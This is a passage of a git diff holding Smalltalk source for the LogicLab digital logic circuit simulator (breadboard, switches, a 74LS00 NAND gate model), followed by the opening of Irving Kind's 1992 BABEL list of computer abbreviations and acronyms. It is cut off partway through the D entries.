isNil + ifTrue: [^nil]. + [(self componentNamed: name) isNil] + whileFalse: [ Š name := + Prompter + prompt: 'Name exists -- enter NEW name' + default: name. + Cursor offset: MenuPosition. + name isNil + ifTrue: [^nil]]. + ^name.! +getNode + "Answer a user-specified LogicNode." + | component | + component := self getExistingComponent. + component isNil + ifTrue: [^nil]. + ^(component getNode).! +initialize + "Private -- initialize a new + LogicLab application." + devices := OrderedCollection new. + signals := OrderedCollection new. + switches := OrderedCollection new. + changed := true.! +install + "Install a user-specified component." + | component | + component := LogicComponent install. + component isNil + ifTrue: [^nil]. + self addComponent: component. + listSelector := self listSelectorFor: component. + breadboard update. + ^component.! +installClassFrom: aStream + "Install a LogicComponent subclass + whose name is the next word on aStream." + | className | + className := aStream nextWord. + (Smalltalk includesKey: className asSymbol) + ifFalse: [ + self error: ('Class: ', className, ' not installed')].! +installComponentFrom: aStream + "Install a LogicComponent instance + whose name is the next word on aStream." + | className class component | + className := aStream nextWord. + class := LogicComponent classNamed: className. + class isNil + ifTrue: [ + self error: ('Unknown class: ', className). + ^nil]. + component := class new installFrom: aStream. + component isNil + ifTrue: [^nil]. + ^(self addComponent: component).! +installConnectionFrom: aStream Š "Install a connection from aStream." + | fromName from toName to fromNode toNode | + fromName := aStream nextWord. + from := self componentNamed: fromName. + from isNil + ifTrue: [ + self error: ('Unknown component: ', fromName). + ^nil]. + fromNode := from getNodeFrom: aStream. + fromNode isNil + ifTrue: [ + self error: ('Unknown node on: ', fromName). + ^nil]. + toName := aStream nextWord. + to := self componentNamed: toName. + to isNil + ifTrue: [ + self error: ('Unknown component: ', toName). + ^nil]. + toNode := to getNodeFrom: aStream. + toNode isNil + ifTrue: [ + self error: ('Unknown node on: ', toName). + ^nil]. + ^(fromNode connect: toNode).! +installFrom: aStream + "Load a circuit from the description + on aStream." + | keyWord | + clashes := Dictionary new. + [(aStream atEnd) + or: [(keyWord := aStream nextWord) isNil]] + whileFalse: [ + keyWord = 'LOAD' + ifTrue: [ + self installClassFrom: aStream] + ifFalse: [ + keyWord = 'INSTALL' + ifTrue: [ + self installComponentFrom: aStream] + ifFalse: [ + keyWord = 'CONNECT' + ifTrue: [ + self installConnectionFrom: aStream] + ifFalse: [ + self error: + ('Unknown command: ', + keyWord)]]]]. + clashes release. + clashes := nil.! +list + "Process a user-specified list request." + | selection | + selection := + (Menu Š labels: ('Components\Connections\', + 'Circuit Description') withCrs + lines: #() + selectors: #(listComponents + listConnections + listCircuit)) + popUpAt: MenuPosition. + selection isNil + ifTrue: [^nil]. + listSelector := selection. + breadboard update.! +listCircuit + "Answer a collection of strings with + the circuit description." + | name stream list | + CursorManager execute change. + name := 'logiclab.tmp'. + stream := File pathName: name. + list := OrderedCollection new. + stream + nextPutAll: '**** Circuit Description ****'; + cr; + cr. + self storeOn: stream. + stream flush. + stream position: 0. + [stream atEnd] + whileFalse: [list add: stream nextLine]. + stream close. + File remove: name. + CursorManager normal change. + ^list.! +listComponentConnections + "Answer a collection of strings listing + the connection chain(s) for the + 'currentComponent'." + currentComponent isNil + ifTrue: [^#()] + ifFalse: [ + ^(#('**** Connection List ****' ' '), + currentComponent connectionList)].! +listComponents + "Answer a collection of strings containing + a list of installed components." + | selection | + selection := + self componentTypeMenu: + #(listDevices listSignals listSwitches). + selection isNil + ifTrue: [^#()]. + ^(self perform: selection).! +listConnections + "Answer a collection of strings listing + the connection chain(s) for a + user-specified component." Š | component | + component := self getExistingComponent. + component isNil + ifTrue: [^#()]. + currentComponent := component. + ^self listComponentConnections.! +listContaining: aComponent + "Answer the list (devices, signals, or switches) + that includes aComponent." + (devices includes: aComponent) + ifTrue: [^devices]. + (signals includes: aComponent) + ifTrue: [^signals]. + ^switches.! +listDevices + "Answer a collection of strings containing + a list of all the installed devices." + | size list | + size := devices size. + size == 0 + ifTrue: [^#('No devices installed')]. + size := size + 1. + list := OrderedCollection new: size. + list add: 'DEVICES'. + devices do: [:aDevice| list add: (' ', (aDevice identify))]. + ^list.! +listSelectorFor: aComponent + "Answer the list selector method used + to produce the list for aComponent's type." + aComponent isDevice + ifTrue: [^#listDevices]. + aComponent isSignal + ifTrue: [^#listSignals]. + ^#listSwitches.! +listSignals + "Answer a collection of strings containing + a list of all the installed input signals." + | size list | + size := signals size. + size == 0 + ifTrue: [^#('No signals installed')]. + size := size + 1. + list := OrderedCollection new: size. + list add: 'SIGNALS'. + signals do: [:aSignal| list add: (' ', (aSignal identify))]. + ^list.! +listSwitches + "Answer a collection of strings containing + a list of all the installed swithces." + | size list | + size := switches size. + size == 0 + ifTrue: [^#('No switches installed')]. + size := size + 1. + list := OrderedCollection new: size. Š list add: 'SWITHCES'. + switches do: [:aSwitch| list add: (' ', (aSwitch identify))]. + ^list.! +load + "Load a circuit description from + a user-specified file." + | file | + file := self getFile. + file isNil + ifTrue: [^nil]. + self installFrom: file. + listSelector := #listDevices. + breadboard update.! +noDelay + "Setup all components to ignore + propagation delays." + signals do: [:signal| signal noDelay]. + switches do: [:switch| switch noDelay]. + devices do: [:device| device noDelay].! +noMenu + "Private -- answer an empty menu." + ^(EmptyMenu new).! +open + "Open the Breadboard and Analyzer windows." + | size position | + size := (Display boundingBox extent * 3) // 4. + position := Display boundingBox center - (size // 2). + topPane := + TopPane new + label: ((self class description), + ' -- Breadboard'); + model: self; + menu: #noMenu; + yourself. + topPane addSubpane: + (breadboard := ListPane new + name: #breadboardList; + model: self; + menu: #breadboardMenu; + change: #doNothing:; + framingRatio: (0 @ 0 extent: 1 @ 1)). + topPane reframe: (position extent: size). + topPane dispatcher openWindow scheduleWindow.! +quit + "Quit this LogicLab." + (self verify: 'Quit this LogicLab?') + ifFalse: [^nil]. + self eraseCircuit. + signals := switches := devices := nil. + analyzer isNil + ifFalse: [ + analyzer closeWindow. + analyzer := nil]. + breadboard dispatcher deactivateWindow closeWindow. + Scheduler systemDispatcher redraw. Š Scheduler resume.! +remove + "Remove a user-specified component." + | component | + component := self getExistingComponent. + component isNil + ifTrue: [^nil]. + changed := true. + listSelector := self listSelectorFor: component. + self removeComponent: component. + breadboard update.! +removeComponent: aComponent + "Remove aComponent from the circuit." + analyzer isNil + ifFalse: [analyzer removeComponent: aComponent]. + (self listContaining: aComponent) remove: aComponent. + aComponent remove.! +reset + "Reset all components." + signals do: [:signal| signal reset]. + switches do: [:switch| switch reset]. + devices do: [:device| device reset].! +restoreDelay + "Setup all components to use + propagation delays." + signals do: [:signal| signal restoreDelay]. + switches do: [:switch| switch restoreDelay]. + devices do: [:device| device restoreDelay].! +resume + "Resume the breadboarding application + after running the simulation." + Cursor offset: breadboard frame center. + topPane dispatcher scheduleWindow.! +run + "Invoke the LogicAnalyzer to run the simulation." + analyzer isNil + ifTrue: [ + analyzer := LogicAnalyzer new. + analyzer openOn: self] + ifFalse: [analyzer activate].! +save + "Store the circuit description in + a user-specified file." + | file | + file := self getFile. + file isNil + ifTrue: [^nil]. + CursorManager execute change. + self storeOn: file. + file + flush; + close. + CursorManager normal change.! +selectName + "Answer a user-selected name from a list Š of the names of installed components." + | names index | + names := self allNames. + (names size == 0) + ifTrue: [^nil]. + index := VariableMenu selectFrom: names. + index isNil + ifTrue: [^nil]. + ^(names at: index).! +signalNames + "Answer a collection of all of the + names of installed signals." + | list | + list := OrderedCollection new: (signals size). + signals do: [:aSignal| list add: aSignal name]. + ^list.! +signals + "Answer the list of installed signals." + ^signals.! +simulate + "Simulate one pseudo-time interval." + signals do: [:signal| signal simulate]. + switches do: [:switch| switch simulate]. + devices do: [:device| device simulate].! +storeClassesOn: aStream + "Write a record of each component class + used by the circuit on aStream." + | classes | + classes := Set new. + devices do: [:aDevice| classes add: aDevice class]. + signals do: [:aSignal| classes add: aSignal class]. + switches do: [:aSwitch| classes add: aSwitch class]. + classes do: [:aClass| + aStream + nextPutAll: ('LOAD ', (aClass name)); + cr].! +storeComponentsFrom: aCollection on: aStream + "Write a record of each logic component from + aCollection installed in the circuit on aStream." + aCollection do: [:aComponent| + aStream nextPutAll: 'INSTALL '. + aComponent storeOn: aStream. + aStream cr].! +storeConnectionsOn: aStream + "Write a record of each connection + in the circuit on aStream." + devices do: [:aDevice| aDevice storeConnectionsOn: aStream]. + signals do: [:aSignal| aSignal storeConnectionsOn: aStream]. + switches do: [:aSwitch| aSwitch storeConnectionsOn: aStream]. + devices do: [:aDevice| aDevice unMark]. + signals do: [:aSignal| aSignal unMark]. + switches do: [:aSwitch| aSwitch unMark].! +storeDevicesOn: aStream + "Write a record of each logic device + installed in the circuit on aStream." Š self storeComponentsFrom: devices on: aStream.! +storeOn: aStream + "Write a description of the circuit on + aStream in a form that can be recovered + by the 'installOn:' method." + self + storeClassesOn: aStream; + storeDevicesOn: aStream; + storeSignalsOn: aStream; + storeSwitchesOn: aStream; + storeConnectionsOn: aStream.! +storeSignalsOn: aStream + "Write a record of each logic signal + installed in the circuit on aStream." + self storeComponentsFrom: signals on: aStream.! +storeSwitchesOn: aStream + "Write a record of each logic switch + installed in the circuit on aStream." + self storeComponentsFrom: switches on: aStream.! +switches + "Answer the list of installed switches." + ^switches.! +switchNames + "Answer a collection of all of the + names of installed swithces." + | list | + list := OrderedCollection new: (switches size). + switches do: [:aSwitch| list add: aSwitch name]. + ^list.! +verify: aPrompt + "Ask the user to verify some condition." + Cursor offset: MenuPosition. + ^((Menu message: aPrompt) notNil).! ! + + +[LISTINÇ TWO] + +LogicSwitch subclass: #ToggleSwitch + instanceVariableNames: '' + classVariableNames: '' + poolDictionaries: '' ! + +!ToggleSwitch class methods ! + +type + "Answer a string with the receiver's type." + ^'Toggle Switch'.! ! +!ToggleSwitch methods ! +identify + "Answer a string identifying the receiver." + ^((self name), + ' (', (self type), ')').! +push: aButton + "Simulate pushing a toggle switch by + inverting its state." + node invert. + node isHigh + ifTrue: [aButton lampOn] + ifFalse: [aButton lampOff]. + (model isNil or: [changeSelector isNil]) + ifFalse: [model perform: changeSelector].! +reset + "Reset the receiver." + button isNil + ifFalse: [ + node isHigh + ifTrue: [button lampOn] + ifFalse: [button lampOff]].! +simulate + "Simulate a toggle switch." + node output.! ! + + +[LISTINÇ THREE] + +LogicSwitch subclass: #PulserSwitch + instanceVariableNames: + 'rest time timer ' + classVariableNames: '' + poolDictionaries: '' ! + +!PulserSwitch class methods ! + +type + "Answer a string with the receiver's type." + ^'Pulser'.! ! +!PulserSwitch methods ! +identify + "Answer a string identifying the receiver." + ^((self name), + ' (', (self type), ' -- ', + (LogicNode + statePrintString: (LogicNode not: rest)), ': ', + (TimeInterval timePrintString: time), ')').! +initialize + "Initialize a new PulserSwitch." + super initialize. + rest := false. + time := timer := 0.! + +install + "Answer the receiver with user-specified + rest state and pulse time." + rest := LogicNode getState. "User will select pulse state" + rest isNil + ifTrue: [^super release]. + rest := LogicNode not: rest. + time := TimeInterval getTimeFor: 'pulse'. + time isNil + ifTrue: [^super release]. + ^self.! +installFrom: aStream + "Answer a new PulserSwitch initialized with + parameters read from aStream." + super installFrom: aStream. + rest := LogicNode stateNamed: aStream nextWord. + node state: rest. + time := aStream nextWord asInteger. + ^self.! +push: aButton + "Simulate pushing a Pulser Switch." + timer == 0 + ifTrue: [node state: (LogicNode not: rest)]. + timer := time. + node isHigh + ifTrue: [aButton lampOn] + ifFalse: [aButton lampOff]. + (model isNil or: [changeSelector isNil]) Š ifFalse: [model perform: changeSelector].! +reset + "Reset the receiver's state to its resting + state and its timer to zero." + node state: rest. + timer := 0. + button isNil + ifFalse: [ + node isHigh + ifTrue: [button lampOn] + ifFalse: [button lampOff]].! +simulate + "Simulate a Pulser Switch." + timer == 0 + ifTrue: [ + node state: rest. + button isNil + ifFalse: [ + node isHigh + ifTrue: [button lampOn] + ifFalse: [button lampOff]]] + ifFalse: [timer := timer - 1]. + node output.! +storeOn: aStream + "Store a record of the receiver on aStream." + super storeOn: aStream. + aStream + nextPutAll: (' ', + (LogicNode statePrintString: rest), ' ', + (time printString)).! ! + +[LISTINÇ FOUR] + +LogicDevice subclass: #N74LS00 + instanceVariableNames: '' + classVariableNames: '' + poolDictionaries: '' ! + +!N74LS00 class methods ! +description + "Answer a string with a description + of the receiver's function." + ^'Quad 2-input NAND gate'.! +type + "Answer a string with the receiver's type." + ^'74LS00'.! ! +!N74LS00 methods ! +initialize + "Private -- initialize the propagation delays + for a new 74LS00 LogicDevice." + super + initialize; + initializeDelays: + #( 5 5 10 5 5 10 0 + 10 5 5 10 5 5 0 ).! +simulate + "Simulate a 74LS00 device." + ((pins at: 1) isHigh and: [(pins at: 2) isHigh]) + ifTrue: [(pins at: 3) output: false] + ifFalse: [(pins at: 3) output: true]. + ((pins at: 4) isHigh and: [(pins at: 5) isHigh]) + ifTrue: [(pins at: 6) output: false] + ifFalse: [(pins at: 6) output: true]. + ((pins at: 10) isHigh and: [(pins at: 9) isHigh]) + ifTrue: [(pins at: 8) output: false] + ifFalse: [(pins at: 8) output: true]. + ((pins at: 13) isHigh and: [(pins at: 12) isHigh]) + ifTrue: [(pins at: 11) output: false] + ifFalse: [(pins at: 11) output: true].! ! + + +[LISTINÇ FIVE] + +output: aState + + "Generate aState as an output from the node." + + old := int. + int := aState. + int == ext + ifTrue: [ + "State is stable" + timer := 0. + ^self outputToConnections]. + "State has changed" + timer == 0 + ifTrue: [ + "No delay in progress -- initiate prop delay" + delay == 0 + ifTrue: [ + "No delay -- just change state" + ext := int] + ifFalse: [ + "Arm delay timer" + timer := delay]. + ^self outputToConnections]. + "Propagation delay in progress" + timer := timer - 1. + timer == 0 + ifTrue: [ + "Timer has expired -- update state" + ext := int]. + self outputToConnections. + + +[LISTINÇ SIX] + +simulate + + "Simulate a 74LS00 device." + + ((pins at: 1) isHigh and: [(pins at: 2) isHigh]) + ifTrue: [(pins at: 3) output: false] + ifFalse: [(pins at: 3) output: true]. + ((pins at: 4) isHigh and: [(pins at: 5) isHigh]) + ifTrue: [(pins at: 6) output: false] + ifFalse: [(pins at: 6) output: true]. + ((pins at: 10) isHigh and: [(pins at: 9) isHigh]) + ifTrue: [(pins at: 8) output: false] + ifFalse: [(pins at: 8) output: true]. + ((pins at: 13) isHigh and: [(pins at: 12) isHigh]) + ifTrue: [(pins at: 11) output: false] + ifFalse: [(pins at: 11) output: true]. + + + \ No newline at end of file diff --git a/textfiles.com/computers/babel92a.txt b/textfiles.com/computers/babel92a.txt new file mode 100644 index 00000000..47fc423f --- /dev/null +++ b/textfiles.com/computers/babel92a.txt @@ -0,0 +1,1983 @@ + UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU + UU UU + UU BABEL: A LISTING OF UU + UU COMPUTER ORIENTED ABBREVIATIONS AND ACRONYMS UU + UU UU + UUUUUUUUUUUUUUUUUUUU Version 92A UUUUUUUUUUUUUUUUUUUUU + +Copyright (c) 1989-1992 Irving Kind All Rights Reserved + + + Compiled when I became frustrated while reading magazine +articles, help wanted ads and equipment for sale brochures....all +pertaining to computers....where the following Abbreviations and +Acronyms were used and their meanings were either not known to me +or were not immediately available. I have actually seen these +combinations of letters used at one time or another in magazines, +newspapers or handbooks. They apply to personal computers, +mainframes, communications, programming, networking, etc......you +name it. This list is free for anyone to use, but with no +guarantees as to its completeness. That is why I am now requesting +your help. Look over the definitions and let me have your +feedback. If you can fill in any of the blanks that I have +questioned; or, if you have ever seen letter combinations that you +also did not understand, please drop me a note at the address +below. + + Also if you find any errors, obsolete information or can +suggest any additions or deletions, they will be most welcome. If +you can help, my thanks in advance. + + In the meantime, print out a copy of this list and keep it on +your desk. I know you will find it useful. Updates to this +listing will be issued three times a year; in January, May and +September. You may download the latest version of BABEL from your +favorite Bulletin Board. If any Bulletin Board SYSOP, Computer +Club Librarian, Organization or Teacher sends me a formatted disk +with a disk mailer, stamped with return postage, I will return the +disk with the latest updated version of BABEL at no charge. See +end of listing for additional information about updates. + + Letter groups followed with " * " were used before 1965. +At some of these, I have noted historical information. + + And please remember to ECAL. + + Irving Kind + c/o K & D + One Church Lane + Baltimore, MD 21208 + +Jan 1992 version = BABEL92A Jan 1993 version = BABEL93A +May 1992 version = BABEL92B May 1993 version = BABEL93B +Sep 1992 version = BABEL92C Sep 1993 version = BABEL93C + + UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU + UU UU + UU BABEL: A LISTING OF UU + UU COMPUTER ORIENTED ABBREVIATIONS AND ACRONYMS UU + UU UU + UUUUUUUUUUUUUUUUUUUU Version 92A UUUUUUUUUUUUUUUUUUUUU + +Copyright (c) 1989-1991 Irving Kind All Rights Reserved + + +AA Auto Answer +AAP Applications Access Point [DEC] +AASP ASCII Asynchronous Support Package +AAT Average Access Time +ABEND Abnormal End +ABIOS Advanced BIOS +ABS Absolute +ABT Abort +AC Automatic Computer + Alternating Current +ACC Accumulator +ACD Automated Call Distribution +ACE Advanced Computing Environment [SCO] +ACF Access Control Field +ACK Acknowledgment +ACMS Application Control Management System +ACP Ancillary Control Program + Auxillary Control Process +ACROSS Automated Cargo Release and Operations Service System +ACS Access + Access Control Set + Access Control System + + Asynchronous Communication Server +ACU Automatic Calling Unit +A/D Analog to Digital +ADA Automatic Data Acquisitions + + (Programming Language named after Agusta Ada Lovelace) +ADC Add with Carry + Analog to Digital Converter +ADCCP Advanced Data Communication Control Procedures +ADF Automatic Document Feed +ADL Address Data Latch +ADLAT Adaptive Lattice Filter +.ADN Add In Utility (file name extension) [Lotus 1-2-3] [LDC] +ADP Automatic Data Processing +ADPCM Adaptive Differential Pulse Code Modulation +ADR Address +ADS Application Development System + + Automatic Distribution System +ADSC Address Status Changed +ADSR Attack, Decay, Sustain, Release +ADT Application Data Types +ADU Automatic Dialing Unit +AE Above or Equal +AEB Analog Expansion Bus [Dialogic] +AF Auxilary carry Flag +AFC Automatic Font Change +AGC Automatic Gain Control +AI Analog Input + Artificial Intelligence +AIA Applications Integration Architecture [DEC] +AIIM Association for Information and Image Management +AISB Association of Imaging Service Bureaus +AISP Association of Information Systems Professionals +AIX Advanced Interactive Executive [IBM] +ALC Arithmetic and Logic Circuits + Automatic Level Control +ALE Address Latch Enable +ALGOL Algorithmic Language (see IAL) +ALR Advanced Logic Research, Inc. +ALT Alternate (mode) +ALU Arithmetic Logic Unit +AMD Advanced Micro Devices +AMMA Advanced Memory Management Architecture [Everex Systems] +ANCOVA Analysis of Covariance +ANI Automatic Number Identification +ANOVA Analysis Of Variance +ANSI American National Standard Institute +AO Analog Output +AOE Application Operating Environment [AT&T] +AOS Add Or Subtract +AP Adjunct Processor + Application Processor +A/P Accounts Payable +APA Arithmetic Processing Accelerator + + All Points Addressable +APAREN Address Parity Enable [IBM] +APCUG Association of PC User Groups +API Application Program Interface + + Application Programming Interface +APL A Programming Language (Mathematics) +.APP Application (file name extension) [R:Base] +APPC Advanced Program-to-Program Communication +APPN Advanced Peer-to-Peer Networking [IBM] +APSE ADA Programming Support Environment +APT Address Pass Through + + Automatically Programmed Tools +A/R Accounts Receivable +.ARC Archive (file name extension) +ARCA Advanced RISC Computing Architecture +ARL Adjusted Ring Length +ARLL Advanced Run Length Limited +ARM Asynchronous Response Mode +ARMA Association of Records Managers and Administrators +ARP Address Resolution Protocol [Novell] +ARPL Adjust Requested Privilege Level +ARTIC A Real-Time Interface Copressor [IBM] +ARQ Automatic Repeat Request +ARU Audio Response Unit +ASAP As Soon As Possible + + Automatic Switching And Processing +.ASC ASCII text (file name extension) +ASCII American Standard Code for Information Interchange +ASIC Application-Specific Integrated Circuit +ASIT Advanced Security and Identification Technology +.ASM Assembler Source Language (file name extension) +ASP Association of Shareware Professionals +ASPS Advanced Signal Processing System +ASR Automatic Send-Receive + Automatic Speech Recognition +ASYNC Asynchronous +AT Advanced Technology + Attention +ATA AT Bus Attachment +ATDP Attention Dial Pulse +ATDT Attention Dial Tone +ATE Automated Test Equipment +ATG Advanced Technology Group +ATH Attention Hang-Up +ATM Adobe Type Manager + Asynchronous Transfer Mode + + Automated Teller Machine +ATR Automatic Terminal Recognition +ATS Administrative Terminal System + + Apple Terminal Services +AT&T American Telephone and Telegraph +ATTN Attention +ATTRIB Attribute (also ATR) +AUDIT Automated Data Input Terminal +AUI Attached Unit Interface +AUTO Automatic +AUX Auxiliary + (First Serial Port) +AVA Audio Visual Authoring [IBM] +AVC Audio Visual Connection [IBM] +AVG Average +AVI Audio Visual Interleaved [Microsoft] +AX Architecture Extended + Automatic Transmission +BAK Binary Adaption Kit [Microsoft] +.BAK Backup (file name extension) +BAL Basic Assembly Language +BAM Boyan Action Module +BARTS Bell Atlantic Regional Timesharing +.BAS Basic Language (file name extension) +BASIC Beginner's All-purpose Symbolic Instruction Code +.BAT Batch Processing (file name extension) +BBS Bulletin Board System +BCD Binary Coded Decimal +BCL Batch Command Language +BCPL Basic Computer Programming Language +BCR Byte Count Register +BDOS Basic Disk Operating System +BE Below or Equal +BEL Bell +BELLCORE Bell Communications Research +BF Bad Flag +B/F Background/Foreground +BGE Branch if Greater or Equal +.BGI Borland Graphic Interface (file name extension) +BGT Branch if Greater Than +BHI Branch if Higher +BHIS Branch if Higher or Same +BI Binary Input +.BIB Bibliography (file name extension) +BIM Beginning of Information Marker +.BIN Binary (file name extension) +BINAC * Binary Automatic Computer +BIOS Basic Input/Output System +BIS Business Information System +BiSYNC (See BSYNC) +BIT Binary digit +BIX Byte Information Exchange (BBS) +.BK! Backup (file name extension) [WordPerfect] +BKSP Backspace +BL Backlit +BLAST Blocked Asynchronous Transmission (protocol) + [Communications Research Group] +.BLD BASIC Bload Graphics (file name extension) +BLE Branch if Less or Equal +BLK Block +BLMC Buried Logic Macrocell +BLOB Binary Large Object +BLOS Branch if Lower Or Same +BMI Branch if Minus +BMIC BusMaster Interface Controller [Intel] +BMP Batch Message Processing Program +.BMP Bitmap (file name extension) [Windows] +BNE Branch if Not Equal +BO Binary Output +BOM Beginning Of Message +BORPQU Borland Pro Quattro +BORQU Borland Quattro +BOS Basic Operating System +BOT Beginning Of Table + Beginning of Tape +BP Base Pointer +BPB BIOS Parameter Block +BPI Bits Per Inch +BPL Branch if Plus +BPS Bits Per Second + Bytes Per Second +BR Bad Register +BRI Basic Rate Interface + Brain Response Interface +BSAM Basic Sequential Access Method +BSC Binary Synchronous Communication +.BSC Boyan Script (file name extension) [Boyan Communications] +BSCS Bachelor of Science (Degree) in Computer Science +BSD Berkely Standard Distribution +BSF Bit Scan Forward +BSI British Standards Institute +BSR Bit Scan Reverse +BSV BASIC Bsave Graphics (file name extension) +BSY Busy +BSYNC Binary Synchronous Communications (protocol) +BT Bit Test +BTAM Basic Telecommunications Access Method [IBM] +BTC Bit Test and Complement +BTP Batch Transfer Program +BTR Bit Test and Reset +BTS Bit Test and Set +BUF Buffer +BWM Block-Write Mode +BYTE Binary Element String +C C Programming Language +.C C source code (file name extension) [C] +CA Collision Avoidance +CAD Computer Aided Design +CADD Computer Aided Design and Drafting +CAE Common Applications Environment + + Computer Aided Engineering +CAG Column Address Generator +CAI Computer Aided Instruction +CAL Calendar + Computer Aided Learning +CAM Common Access Method + Computer Aided Manufacturing + + Contents Addressable Memory +CAN Cancel +CAP Central Arbitration Point + + Computer Aided Publishing +CAPD Computing To Assist Persons With Disabilities [Johns + Hopkins University] +CAPS Capitals (Upper Case Letters) + + Cassette Programming System +CAS Column Address Select + + Communicating Applications Specification + + Computer Aided Styling +CASE Computer Aided Software Engineering +CASL Crosstalk Application Scripting Language [DCA] +CASS Computer Assisted Search Service +CASSIS Classified and Search Support Information System +CAT Computer Aided Testing + Computer Aided Tomography + + Computer Aided Transcription + Concatenate +.CAT Catalog (file name extension) +CATV Community Antenna Television +CAV Constant Angular Velocity +CBCR Channel Byte Count Register +CBL Computer Based Learning +.CBL COBOL source code (file name extension) +CBT Computer Based Training +CBW Convert Byte to Word +CBX Computer-Controlled Branch Exchange +CC Cluster Controller +CCD Charged-Coupled Device +CCFT Cold Cathode Fluorescent Tube +CCITT Consultative Committee for International + Telegraph and Telephone +CCP Console Command Processor +CCS Common Communications Support +CD Carrier Detect + Change Directory + + Collision Detection + Color Display + Compact Disk +C/D Control Data +CDA Compound Document Architecture [DEC] +CDC Control Data Corporation +CD_CHRDY Card Channel Ready [IBM] +CDE Complex Data Entry +.CDF Comma Delimited Format (file name extension) +CD-I Compact Disk - Interactive +CDOS Concurrent Disk Operating System +CDL Computer Design Language +CD-RDx Compact Disk - Read Only Memory Data Exchange Standard +CD-ROM Compact Disk - Read Only Memory +CDR Call Detail Record + Call Detail Recording +CDRL Contract Data Requirements List +CD-RTOS Compact Disk - Real Time Operating System +CDS Current Directory Structure +CD-V Compact Disk - Video +CE Cache Enable + Chip Enable + Collision Elimination + + Convert Enable +CEG Continuous Edge Graphic +CEI Conducted Electromagnetic Interference +.CFG Configuration (file name extension) +CGA Color Graphics Adapter +CGI Computer Generated Images + + Computer Graphics Interface +.CGM Computer Graphics Metafile (file name extension) + + Graph (file name extension) [Lotus 1-2-3] [LDC] +CHAR Character +CHCK Channel Check +CHGRP Change Group +.CHK CHKDSK (file name extension) +CHKDSK Check Disk +CHMOD Change Mode +CHOWN Change Owner +CHP Chapter +CHR Character +CICS/VS Customer Information Control System/ + Virtual Storage [IBM] +CIM CompuServe Information Manager + + Computer Integrated Manufacturing +CIOCS Communication Input/Output Control System +CIP Command Interface Port +CIRC Circular Reference +CIS CompuServe Information Service + + Computer Information Systems +CISC Complex Instruction Set Computer +CKD Count Key Data (device) +CLAR Channel Local Address Register +CLC Clear Carry Flag +CLD Clear Direction Flag +CLI Clear Interrupt Flag + Command Line Interface +CLIST Command List +CLK Clock +CLNP Connectionless Network Protocol +.CLP Clipboard (file name extension) [Windows] +CLS Clear Screen +CLTS Clear Task Switch Flag +CLV Constant Linear Velocity +CM Centimeter + Control Mark + Corrective Maintenance +CMA Concert Multi-thread Architecture +CMC Communication Mangement Configuration + + Complement Carry Flag +.CMD Command (file name extension) +CMIP Common Management Information Protocol +CMIS Common Management Information System +CML Current Mode Logic +CMMU Cache/Memory Management Unit [Motorola] +CMOS Complementary Metal-Oxide Semiconductor +CMP Compare + Computer +CMPS Compare word String +CMS Code Management System + Compiler Monitor System + + Conversation Monitor System +CMY Cyan-Magenta-Yellow (color model) +CMYK Cyan-Magenta-Yellow-Black (color model) +CNC Computerized Numerical Control +.CNF Configuration (file name extension) +CNG Calling (tone) +CNVT Convert +CO Central Office + Command Output + Convert Out +.COB COBAL source code (file name extension) +COBOL Common Business-oriented Language (See HLL) +.COD Code List (file name extension) +CODASYL * Conference on Data System Languages (Group that + designed COBOL) +COEM Commercial Original Equipment Manufacturer +COGO Coordinate Geometry (Programming Language) +COL Computer Oriented Language +.COM Command (file name extension) +COMDEX Computer Dealers Exposition +COM1 First serial Port (asynchronous port) +COM2 Second serial Port +COM3 Third serial Port +COM4 Fourth serial Port +COMP Compare + Communications +COMSAT Communications Satellite Corporation +CON Console (includes Keyboard and Screen) +CONFIG Configuration +COS Compatible Operating System +COSMOS Computer System for Mainframe Operations +CP Copy Protected +CPA Certified Public Accountant +CPE Central Processing Element + + Customer Premise Equipment + + Customer Provided Equipment +CPG Clock Pulse Generator +CPI Characters Per Inch + Clock Per Instruction + + Common Programming Interface [IBM] +.CPI Code Page Information (file name extension) [MS-DOS] +CPL Current Privilege Level +CP/M Control Program for Microcomputers +CPS Characters Per Second + Cycles Per Second +CPT Command Pass Through +CPU Central Processing Unit +CR Carriage Return +CRC Cyclic Redundancy Check +CRF Cross Reference File +CR/LF Carriage Return/Line Feed +CROM Control Read Only Memory +CRT Cathode Ray Tube +CRTC CRT Controller +CS Chip Select + Clear to Send + Code Segment +CSAR Channel System Address Register +CSG Constructive Solid Geometry + + Consulting Services Group [Lotus] +CSL Computer Sensitive Language +CSMA Carrier Sense Multiple Access +CSP Commercial Subroutine Package + + CompuCom Speed Protocol [CompuCom] +CSTA Computer-Supported Telephony Applications +C&T Chips and Technologies +CTOS Computerized Tomography Operating System +CTPA Coax-to-Twisted-Pair Adapter +CTRL Control +CTS Clear To Send +CTSS * Compatible Time Sharing System +CUA Common User Access [IBM] +CUB Cursor Backward +CUD Cursor Down +CUF Cursor Forward +CUI Common User Interface [IBM] +CUP Cursor Position +CUPID Completely Universal Processor I/O Design [AST] +.CUR Cursor (file name extension) +CUU Cursor Up +CVGA Color Video Gaphics Array +CVIA Computer Virus Industry Association +CWD Convert Word to Double Word +CYL Cylinder +CYMK Cyan-Yellow-Magenta-Black (color model) +D/A Digital to Analog +DAA Data Access Arrangement + + Decimal Adjust for Addition +DAC Digital to Analog Converter +DAL Data Access Language [Apple Computer] + + Disk Access Lockout +DAM Data Acquisition and Monitoring +DAP Data Access Protocol [DEC] +DAS Decimal Adjust for Subtraction +DASD Direct Access Storage Device +DAT Digital Audio Tape +.DAT Data (file name extension) +DATACOM Data Communications +.DBF Database (file name extension) +DB Data Base + Data Buffer +DBM Data Base Manager +DBMS Data Base Management System +DBS Data Base Server +DB2 Database 2 +DC Data Collection + Data Communication + Data Control + + Device Control + Direct Current +DCA Digital Communications Associates + + Document Content Architecture +DCAF Distributed Console Access Facility [IBM] +DCB Disk Coprocessor Board [Novell] +DCC Display Combination Code +DCD Data Carrier Detect +DCE Data Communications Equipment + + Distributed Computing Environment [OSF] + + Distributed Computing Equipment +DCF Data Communication Facility [IBM] + + Data Count Field [IBM] +DCL Declaration + DEC Command Language [DEC] + + Device Clear + Digital Control Logic + + Digital Command Language [Digital] +DCS Data Collection System + Data Control System +.DCT Dictionary (file name extension) +DD Day + Digital Display + Double Density +DDD Direct Distance Dialing +DDE Direct Data Entry + Dynamic Data Exchange [Microsoft] +DDEML Dynamic Data Exchange Management Library [Microsoft] +DDL Data Definition Language + Data Description Language +DDM Distributed Data Management +DDS Design Data 